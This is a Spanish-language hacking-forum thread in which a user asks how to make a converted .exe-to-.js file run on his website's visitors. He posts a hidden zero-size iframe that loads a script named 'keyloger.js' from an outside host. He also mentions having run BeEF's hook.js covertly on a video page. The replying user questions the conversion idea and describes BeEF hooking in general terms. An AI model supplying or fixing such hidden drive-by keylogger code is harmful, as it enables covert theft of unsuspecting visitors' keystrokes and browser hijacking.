Underc0de

Foros Generales => Dudas y pedidos generales => Mensaje iniciado por: n0z en Enero 23, 2019, 11:37:24 PM

Título: Duda
Publicado por: n0z en Enero 23, 2019, 11:37:24 PM
buenas mi gente,tengo una duda que de seguro alguien podria ayudarme.
Escenario:
Puse un servidor xampp en ina pc con win 7. Tengo un programa que me convierte un .exe a .js. Bueno hay manera de que ese .js se instale en los visitantes,o solo seria atacando el browser como lo hace beef? Trate usando un hidden iframe pero no se nada de javascript por lo que quizas no sirve. Alguien me podria dar el codigo de ejecutar ese .js en un iframe?
abajo les dejo el que yo use

<div style="position:absolute;left:0;top:0;visibility:hidden;" id="datadiv">
    <iframe height="0" width="0">
        <script src="http://blahblah.bo/keyloger.js" type="text/javascript"></script>
    </iframe>
</div>
Título: Re:Duda
Publicado por: DtxdF en Enero 24, 2019, 08:45:17 AM
@n0z (https://underc0de.org/foro/index.php?action=profile;u=50077)

Convertir un .exe a .js?, No creo que se pueda y si se cree que se puede supongo que sólo me es la extensión.

Un .js a .exe si, mira este programa: http://www.f2ko.de/es/ov2e.php

Has visto el código que te genera el programa?
Has verificado las diferencias entre el código del ejecutable de Windows y el script que te genera en Javascript?, Si son iguales sólo cambia la extensión.
Título: Re:Duda
Publicado por: n0z en Enero 24, 2019, 09:20:10 PM
pues no he visto el codigo generado,y suponiendo q tenga un servidor.js,como podria hacer ejecucion mediate i frame?
Y gracias por responer. Antes tenia una pagina en donde mientras miraban un video el hook.js de beef se ejecutaba. Por eso pregundo si esto seria solo con el hook.js para browsers
Título: Re:Duda
Publicado por: DtxdF en Enero 25, 2019, 10:03:18 AM
@n0z (https://underc0de.org/foro/index.php?action=profile;u=50077)

Hermano creo que estas confundido, primero me hablaste que tenías un programa que te convierte los ejecutables de Windows en códigos Javascript y ahora me estás hablando de beef.

Supongo que lo que quieres hacer es enganchar los navegadores hacia el servidor atacante (hookear) usando beef u otra herramienta de hacking.

Si el código malicioso de beef es Javascript y es poderoso.

Si lo que quieres es atacar a un servidor puedes hacer con php o parecido, aunque si no me equivoco puedes hacerlo con NodeJS o parecido.